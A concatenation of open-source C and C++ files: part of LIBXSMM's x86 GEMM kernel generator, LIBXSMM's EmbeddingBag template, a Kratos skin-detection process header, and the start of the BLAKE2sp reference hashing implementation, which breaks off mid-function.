((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 0, 1 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 0, 1 );
}
}
}
/* clean stack and restore help5 */
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
} else if ( ( (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) && (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CPX) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
unsigned int l_m_2_blocking = (l_m_blocking/2)*2;
l_m = 0;
if ( i_micro_kernel_config->use_masking_a_c != 0 ) {
for ( l_m = 0 ; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNEPS2BF16,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
0);
/* store 16 bit values into ymm portion of the register */
if ( l_m == (l_m_blocking - 1) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 0, 1 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 0, 1 );
}
}
} else {
for (; l_m < l_m_2_blocking; l_m+=2 ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
unsigned int reg_X2 = l_vec_reg_acc_start + l_m+1 + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNE2PS2BF16,
i_micro_kernel_config->vector_name,
reg_X, reg_X2,
0,
0);
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 0, 0, 1 );
}
for (; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNEPS2BF16,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
0);
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 0, 1 );
}
}
}
} else if ( ( (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) || (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) ) &&
( (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* pick the right instrucitons */
unsigned int inst_f32_i32 = ( ( i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED ) != 0 ) ? LIBXSMM_X86_INSTR_VCVTPS2UDQ : LIBXSMM_X86_INSTR_VCVTPS2DQ;
unsigned int inst_i32_i8 = ( ( i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED ) != 0 ) ? LIBXSMM_X86_INSTR_VPMOVUSDB : LIBXSMM_X86_INSTR_VPMOVSDB;
/* there are case where we need to load the scaling factor's address from the stack argument list */
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_OFFSET) != 0 ) {
libxsmm_x86_instruction_load_arg_to_reg( io_generated_code, 0, i_gp_reg_mapping->gp_reg_scf );
}
/* loading scf into register 3 */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
i_gp_reg_mapping->gp_reg_scf,
LIBXSMM_X86_GP_REG_UNDEF, 0, 0,
i_micro_kernel_config->vector_name,
3, 0, 1, 0 );
/* Zero out register 0 to perform relu */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->vxor_instruction,
i_micro_kernel_config->vector_name,
0,
0,
0);
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
/* Convert result to F32 */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTDQ2PS,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X );
/* Multiply with scaling factor */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMULPS,
i_micro_kernel_config->vector_name,
reg_X,
3,
reg_X );
/* Perform RELU */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMAXPS,
i_micro_kernel_config->vector_name,
reg_X,
0,
reg_X);
/* Round result to int32 */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
inst_f32_i32,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X,
0);
/* down-convert to int8 */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
inst_i32_i8,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
i_micro_kernel_config->vector_name,
reg_X, ( ( l_m == (l_m_blocking - 1)) && ( i_micro_kernel_config->use_masking_a_c != 0 ) ) ? 2 : 0, 0, 1 );
}
}
} else {
/* storing C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size),
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n), ( l_m == (l_m_blocking - 1) ) ? i_micro_kernel_config->use_masking_a_c : 0, 0, 1 );
}
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
/* determining how many prefetches we need in M direction as we just need one prefetch per cache line */
unsigned int l_m_advance = 64 / ((i_micro_kernel_config->vector_length) * (i_micro_kernel_config->datatype_size)); /* 64: hardcoded cache line length */
for (l_m = 0; l_m < l_m_blocking; l_m += l_m_advance ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_b_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
}
}
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_initialize_avx512_mask( libxsmm_generated_code* io_generated_code,
const unsigned int i_gp_reg_tmp,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_mask_count ) {
unsigned int l_mask;
/* init full mask */
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_mask = 0xff;
} else {
l_mask = 0xffff;
}
/* shift right by "inverse" remainder */
l_mask = l_mask >> i_mask_count;
/* move mask to GP register */
libxsmm_x86_instruction_alu_imm( io_generated_code,
LIBXSMM_X86_INSTR_MOVQ,
i_gp_reg_tmp,
l_mask );
if ( ( io_generated_code->arch >= LIBXSMM_X86_AVX512 ) && ( io_generated_code->arch <= LIBXSMM_X86_ALLFEAT ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVW_GPR_LD,
i_gp_reg_tmp,
LIBXSMM_X86_AVX512_MASK );
if ( ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVD_GPR_LD,
i_gp_reg_tmp,
2 );
} else if ( ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVQ_GPR_LD,
i_gp_reg_tmp,
2 );
} else {
/* no addtional mask is needed */
}
} else {
/* shouldn't happen */
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_ARCH );
return;
}
}
|
EmbeddingBag.h | /******************************************************************************
* Copyright (c) Intel Corporation - All rights reserved. *
* This file is part of the LIBXSMM library. *
* *
* For information on the license, see the LICENSE file. *
* Further information: https://github.com/libxsmm/libxsmm/ *
* SPDX-License-Identifier: BSD-3-Clause *
******************************************************************************/
/* Dhiraj Kalamkar, Evangelos Georganas (Intel Corp.)
******************************************************************************/
#if defined(USE_LIBXSMM_JIT)
#include <libxsmm.h>
#endif
#include "utils.h"
#include "rtm.h"
template <typename T>
class EmbeddingBagImpl
{
public:
EmbeddingBagImpl(long M, long E) : M(M), E(E)
{
#ifdef USE_LIBXSMM_JIT
libxsmm_meltw_unary_shape unary_shape_f32 = libxsmm_create_meltw_unary_shape( E, 0, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
libxsmm_meltw_unary_shape unary_shape_f16 = libxsmm_create_meltw_unary_shape( E, 0, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
libxsmm_meltw_binary_shape binary_shape_f32 = libxsmm_create_meltw_binary_shape( E, 1, _ld, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
weight_ = (T*)my_malloc((size_t)M * E * sizeof(T), alignment);
_ld = E;
if (sizeof(T) == 4) {
kernel = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REDUCE_COLS_IDX_OP_ADD, unary_shape_f32, (sizeof(long) == 8) ? LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_8BYTES : LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_4BYTES );
} else {
kernel = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REDUCE_COLS_IDX_OP_ADD, unary_shape_f16, (sizeof(long) == 8) ? LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_8BYTES : LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_4BYTES );
}
kernel1 = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REPLICATE_COL_VAR, unary_shape_f32, LIBXSMM_MELTW_FLAG_UNARY_NONE );
kernel2 = libxsmm_dispatch_meltw_binary_v2( LIBXSMM_MELTW_TYPE_BINARY_MULADD, binary_shape_f32, LIBXSMM_MELTW_FLAG_BINARY_BCAST_SCALAR_IN_0 );
#endif
}
~EmbeddingBagImpl()
{
my_free(weight_);
weight_ = 0;
}
void init(T low = -0.1, T high = 0.1)
{
init_random(M * E, weight_, low, high);
}
#ifdef USE_LIBXSMM_JIT
void forward(long N, long NS, const long *offsets, const long *indices, T *output_)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict output)[E] = (T(*)[*])output_;
#pragma omp parallel for
for (int n = 0; n < N; n++)
{
libxsmm_meltw_unary_param params;
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
unsigned long long __n = end-start;
params.in.primary = weight;
params.in.secondary = (void*)&indices[start];
params.in.tertiary = &__n;
params.out.primary = &output[n][0];
kernel( ¶ms );
}
}
#else
void forward(long N, long NS, const long *offsets, const long *indices, T *output_)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict output)[E] = (T(*)[*])output_;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
#pragma omp simd
for (long v = 0; v < E; v++)
output[n][v] = 0;
for (long s = start; s < end; s++)
{
auto ind = indices[s];
#pragma omp simd
for (long v = 0; v < E; v++)
{
output[n][v] += weight[ind][v];
}
}
}
}
#endif
#ifdef USE_LIBXSMM_JIT
void backward(long N, long NS, const T *gradout_, const long *offsets, const long *indices, T *values_)
{
T(*__restrict gradout)[E] = (T(*)[*])gradout_;
T(*__restrict values)[E] = (T(*)[*])values_;
int _ld = E;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
libxsmm_meltw_unary_param unary_param;
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
unsigned long long _N = end-start;
unary_param.in.primary = (void*)&gradout[n][0];
unary_param.out.primary = (void*)&values[start][0];
unary_param.op.primary = (void*)&_N;
kernel1(&unary_param);
}
}
#else
void backward(long N, long NS, const T *gradout_, const long *offsets, const long *indices, T *values_)
{
T(*__restrict gradout)[E] = (T(*)[*])gradout_;
T(*__restrict values)[E] = (T(*)[*])values_;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
for (long s = start; s < end; s++)
{
#pragma omp simd
#ifdef STREAMING_WRITES
#pragma vector nontemporal(values)
#endif
for (long v = 0; v < E; v++)
values[s][v] = gradout[n][v];
}
}
}
#endif
#ifdef USE_LIBXSMM_JIT
void update(long NS, const T *grads_, const long *indices, float lr, long M, int use_rtm)
{
int use_lock_free = use_rtm == 0 ? 1: 0;
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict grads)[E] = (T(*)[*])grads_;
int _ld = E;
if(use_lock_free) {
/*printf("Using lock free update\n");*/
int max_thr = omp_get_max_threads();
if(M < max_thr) max_thr = M;
#pragma omp parallel num_threads(max_thr)
{
int tid = omp_get_thread_num();
for(long i = 0; i < NS; i++) {
auto ind = indices[i];
if(ind % max_thr == tid) {
libxsmm_meltw_binary_param binary_param;
binary_param.in0.primary = (void*)&lr;
binary_param.in1.primary = (void*)&grads[i][0];
binary_param.out.primary = (void*)&weight[ind][0];
{
kernel2(&binary_param);
}
}
}
}
} else {
SimpleSpinLock fallBackLock;
#pragma omp parallel for
for (long i = 0; i < NS; i++)
{
libxsmm_meltw_binary_param binary_param;
long ind = indices[i];
binary_param.in0.primary = (void*)&lr;
binary_param.in1.primary = (void*)&grads[i][0];
binary_param.out.primary = (void*)&weight[ind][0];
{
TransactionScope guard(fallBackLock, 100, 0);
kernel2(&binary_param);
}
}
}
}
#else
void update(long NS, const T *grads_, const long *indices, float lr, long M, int use_rtm)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict grads)[E] = (T(*)[*])grads_;
int use_lock_free = use_rtm == 0 ? 1: 0;
if(use_lock_free) {
int max_thr = omp_get_max_threads();
if(M < max_thr) max_thr = M;
#pragma omp parallel num_threads(max_thr)
{
int tid = omp_get_thread_num();
for(long i = 0; i < NS; i++) {
auto ind = indices[i];
if(ind % max_thr == tid) {
#pragma omp simd
for (long v = 0; v < E; v++)
weight[ind][v] += lr * grads[i][v];
}
}
}
} else {
SimpleSpinLock fallBackLock;
#pragma omp parallel for
for (long i = 0; i < NS; i++)
{
long ind = indices[i];
{
TransactionScope guard(fallBackLock, 100, 0);
#pragma omp simd
for (long v = 0; v < E; v++)
weight[ind][v] += lr * grads[i][v];
}
}
}
}
#endif
T *weight_;
long M;
long E;
#ifdef USE_LIBXSMM_JIT
int _ld;
libxsmm_meltwfunction_unary kernel;
libxsmm_meltwfunction_unary kernel1;
libxsmm_meltwfunction_binary kernel2;
#endif
};
|
sub_model_part_skin_detection_process.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Jordi Cotela
//
#if !defined(KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED)
#define KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED
// System includes
#include <string>
#include <iostream>
// Project includes
#include "skin_detection_process.h"
namespace Kratos
{
///@addtogroup KratosCore
///@{
///@name Kratos Classes
///@{
/// Create a SubModelPart covering a part of the outside skin of the computation domain where a condition is met.
/** For example, create the outer skin for the part of the domain belonging to a given SubModelPart.
*/
template<SizeType TDim>
class KRATOS_API(KRATOS_CORE) SubModelPartSkinDetectionProcess: public SkinDetectionProcess<TDim>
{
KRATOS_DEFINE_LOCAL_FLAG( NODE_SELECTED );
// Internal class used to select which faces to create.
class FaceSelector
{
public:
KRATOS_CLASS_POINTER_DEFINITION(FaceSelector);
virtual ~FaceSelector() = default;
virtual void Prepare(ModelPart& rMainModelPart) const = 0;
virtual bool IsSelected(const Geometry<Node<3>>::PointsArrayType&) const = 0;
};
// Select faces where all nodes belong to given SubModelPart.
class SelectIfAllNodesOnSubModelPart: public FaceSelector
{
std::string mName;
public:
SelectIfAllNodesOnSubModelPart(const std::string& rName): mName(rName) {}
void Prepare(ModelPart& rMainModelPart) const override
{
ModelPart& r_model_part = rMainModelPart.GetSubModelPart(mName);
auto node_begin = r_model_part.NodesBegin();
const int num_nodes = r_model_part.NumberOfNodes();
#pragma omp parallel for
for (int k = 0; k < num_nodes; k++)
{
(node_begin+k)->Set(SubModelPartSkinDetectionProcess::NODE_SELECTED);
}
}
bool IsSelected(const Geometry<Node<3>>::PointsArrayType& rNodes) const override
{
bool select = true;
for (auto i_node = rNodes.begin(); i_node != rNodes.end(); ++i_node)
{
select &= i_node->Is(SubModelPartSkinDetectionProcess::NODE_SELECTED);
}
return select;
}
};
public:
///@name Type Definitions
///@{
/// Pointer definition of SubModelPartSkinDetectionProcess
KRATOS_CLASS_POINTER_DEFINITION(SubModelPartSkinDetectionProcess);
using typename SkinDetectionProcess<TDim>::HashMapVectorIntType;
using typename SkinDetectionProcess<TDim>::HashMapVectorIntIdsType;
using typename SkinDetectionProcess<TDim>::VectorIndexType;
using ConditionCheckType = bool(const Geometry<Node<3>>::PointsArrayType&);
///@}
///@name Life Cycle
///@{
/// Constructor
SubModelPartSkinDetectionProcess(ModelPart& rModelPart, Parameters Settings);
/// Deleted default constructor.
SubModelPartSkinDetectionProcess() = delete;
/// Deleted copy constructor.
SubModelPartSkinDetectionProcess(SubModelPartSkinDetectionProcess const &rOther) = delete;
/// Destructor.
~SubModelPartSkinDetectionProcess() override = default;
///@}
///@name Operators
///@{
/// Deleted sssignment operator.
SubModelPartSkinDetectionProcess &operator=(SubModelPartSkinDetectionProcess const &rOther) = delete;
///@}
///@name Operations
///@{
void Execute() override;
///@}
///@name Input and output
///@{
std::string Info() const override
{
return "SkinDetectionProcess";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << "SkinDetectionProcess";
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
}
///@}
protected:
///@name Protected Operations
///@{
void CreateConditions(
ModelPart& rMainModelPart,
ModelPart& rSkinModelPart,
HashMapVectorIntType& rInverseFaceMap,
HashMapVectorIntIdsType& rPropertiesFaceMap,
std::unordered_set<IndexType>& rNodesInTheSkin,
const std::string& rConditionName) const override;
/**
* @brief This method provides the defaults parameters to avoid conflicts between the different constructors
*/
const Parameters GetDefaultParameters() const override;
///@}
private:
///@name Member Variables
///@{
typename FaceSelector::Pointer mpFaceSelector;
///@}
///@name Private Operations
///@{
static bool FaceIsNeeded(const Geometry<Node<3>>::PointsArrayType&)
{
return true;
}
///@}
}; // Class SubModelPartSkinDetectionProcess
///@}
///@name Input and output
///@{
/// input stream function
template<SizeType TDim>
inline std::istream &operator>>(std::istream &rIStream,
SubModelPartSkinDetectionProcess<TDim> &rThis);
/// output stream function
template<SizeType TDim>
inline std::ostream &operator<<(std::ostream &rOStream,
const SubModelPartSkinDetectionProcess<TDim> &rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@}
} // namespace Kratos.
#endif // KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED defined
|
blake2sp-ref.c | /*
BLAKE2 reference source code package - reference C implementations
Written in 2012 by Samuel Neves <sneves@dei.uc.pt>
To the extent possible under law, the author(s) have dedicated all copyright
and related and neighboring rights to this software to the public domain
worldwide. This software is distributed without any warranty.
You should have received a copy of the CC0 Public Domain Dedication along with
this software. If not, see <http://creativecommons.org/publicdomain/zero/1.0/>.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#if defined(_OPENMP)
#include <omp.h>
#endif
#include "blake2.h"
#include "blake2-impl.h"
#define PARALLELISM_DEGREE 8
static inline int blake2sp_init_leaf( blake2s_state *S, uint8_t outlen, uint8_t keylen, uint64_t offset )
{
blake2s_param P[1];
P->digest_length = outlen;
P->key_length = keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store48( P->node_offset, offset );
P->node_depth = 0;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
static inline int blake2sp_init_root( blake2s_state *S, uint8_t outlen, uint8_t keylen )
{
blake2s_param P[1];
P->digest_length = outlen;
P->key_length = keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store48( P->node_offset, 0ULL );
P->node_depth = 1;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
int blake2sp_init( blake2sp_state *S, const uint8_t outlen )
{
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
if( blake2sp_init_root( S->R, outlen, 0 ) < 0 )
return -1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, 0, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
return 0;
}
int blake2sp_init_key( blake2sp_state *S, const uint8_t outlen, const void *key, const uint8_t keylen )
{
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( !key || !keylen || keylen > BLAKE2S_KEYBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
if( blake2sp_init_root( S->R, outlen, keylen ) < 0 )
return -1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, keylen, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
return 0;
}
int blake2sp_update( blake2sp_state *S, const uint8_t *in, uint64_t inlen )
{
size_t left = S->buflen;
size_t fill = sizeof( S->buf ) - left;
if( left && inlen >= fill )
{
memcpy( S->buf + left, in, fill );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, BLAKE2S_BLOCKBYTES );
in += fill;
inlen -= fill;
left = 0;
}
#if defined(_OPENMP)
#pragma omp parallel shared(S), num_threads(PARALLELISM_DEGREE)
#else
for( size_t id__ = 0; id__ < PARALLELISM_DEGREE; ++id__ )
#endif
{
#if defined(_OPENMP)
size_t id__ = omp_get_thread_num();
#endif
uint64_t inlen__ = inlen;
const uint8_t *in__ = ( const uint8_t * )in;
in__ += id__ * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S->S[id__], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
}
in += inlen - inlen % ( PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES );
inlen %= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
if( inlen > 0 )
memcpy( S->buf + left, in, inlen );
S->buflen = left + inlen;
return 0;
}
int blake2sp_final( blake2sp_state *S, uint8_t *out, const uint8_t outlen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
{
if( S->buflen > i * BLAKE2S_BLOCKBYTES )
{
size_t left = S->buflen - i * BLAKE2S_BLOCKBYTES;
if( left > BLAKE2S_BLOCKBYTES ) left = BLAKE2S_BLOCKBYTES;
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, left );
}
blake2s_final( S->S[i], hash[i], BLAKE2S_OUTBYTES );
}
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->R, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( S->R, out, outlen );
}
int blake2sp( uint8_t *out, const void *in, const void *key, uint8_t outlen, uint64_t inlen, uint8_t keylen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
blake2s_state S[PARALLELISM_DEGREE][1];
blake2s_state FS[1];
/* Verify parameters */
if ( NULL == in && inlen > 0 ) return -1;
if ( NULL == out ) return -1;
if ( NULL == key && keylen > 0) return -1;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( keylen > BLAKE2S_KEYBYTES ) return -1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S[i], outlen, keylen, i ) < 0 ) return -1;
S[PARALLELISM_DEGREE - 1]->last_node = 1; // mark last node
if( keylen > 0 )
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
#if defined(_OPENMP)
